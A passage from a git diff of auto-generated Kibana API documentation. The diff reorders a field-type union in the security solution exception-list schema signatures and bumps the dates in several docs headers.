\"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_schema/index.ts", "deprecated": false, 
@@ -4095,7 +4095,7 @@ "label": "UpdateExceptionListItemSchemaDecoded", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; _version: string | undefined; comments: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id: string | undefined; item_id: string | undefined; meta: object | undefined; namespace_type: \"single\" | \"agnostic\" | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"namespace_type\" | \"os_types\"> & { comments: ({ comment: string; } & { id?: string | undefined; })[]; tags: string[]; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { 
field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" + "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: 
\"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; _version: string | undefined; comments: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id: string | undefined; item_id: string | undefined; meta: object | undefined; namespace_type: \"single\" | \"agnostic\" | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"namespace_type\" | \"os_types\"> & { comments: ({ comment: string; } & { id?: string | undefined; })[]; tags: string[]; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" ], "path": 
"packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_schema/index.ts", "deprecated": false, 
@@ -4628,7 +4628,7 @@ "StringC", "; entries: ", "Type", - "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: 
string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; list_id: ", + "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | 
\"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; list_id: ", "Type", "; name: ", "StringC", 
@@ -6914,7 +6914,7 @@ "StringC", "; entries: ", "Type", - "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: 
string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; item_id: ", + "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | 
\"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; item_id: ", "Type", "; list_id: ", "Type", 
@@ -7847,7 +7847,7 @@ ], "signature": [ "Type", - "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; 
operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>" + "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: 
\"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/non_empty_entries_array/index.ts", "deprecated": false, 
@@ -8780,7 +8780,7 @@ "StringC", "; entries: ", "Type", - "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: 
string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; name: ", + "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | 
\"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; name: ", "StringC", "; type: ", "KeyofC", 
@@ -8833,7 +8833,7 @@ "StringC", "; entries: ", "Type", - "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: 
string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; name: ", + "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | 
\"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; name: ", "StringC", "; type: ", "KeyofC", diff --git a/api_docs/kbn_securitysolution_io_ts_list_types.mdx b/api_docs/kbn_securitysolution_io_ts_list_types.mdx index 2040bc26e9ed5..248793ba8147d 100644 --- a/api_docs/kbn_securitysolution_io_ts_list_types.mdx +++ b/api_docs/kbn_securitysolution_io_ts_list_types.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-io-ts-list-types title: "@kbn/securitysolution-io-ts-list-types" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-io-ts-list-types plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-io-ts-list-types'] --- import kbnSecuritysolutionIoTsListTypesObj from './kbn_securitysolution_io_ts_list_types.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_io_ts_types.mdx b/api_docs/kbn_securitysolution_io_ts_types.mdx index 90c4f46a15ccf..40c9a3127d04b 100644 --- a/api_docs/kbn_securitysolution_io_ts_types.mdx +++ b/api_docs/kbn_securitysolution_io_ts_types.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-io-ts-types title: "@kbn/securitysolution-io-ts-types" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-io-ts-types plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-io-ts-types'] --- import kbnSecuritysolutionIoTsTypesObj from './kbn_securitysolution_io_ts_types.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_io_ts_utils.mdx b/api_docs/kbn_securitysolution_io_ts_utils.mdx index 7b8ad94a72267..683968fccd406 100644 --- a/api_docs/kbn_securitysolution_io_ts_utils.mdx +++ b/api_docs/kbn_securitysolution_io_ts_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-io-ts-utils title: "@kbn/securitysolution-io-ts-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-io-ts-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-io-ts-utils'] --- import kbnSecuritysolutionIoTsUtilsObj from './kbn_securitysolution_io_ts_utils.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_list_api.devdocs.json b/api_docs/kbn_securitysolution_list_api.devdocs.json index 79b6b26e9f098..53a9d300892b8 100644 --- a/api_docs/kbn_securitysolution_list_api.devdocs.json +++ 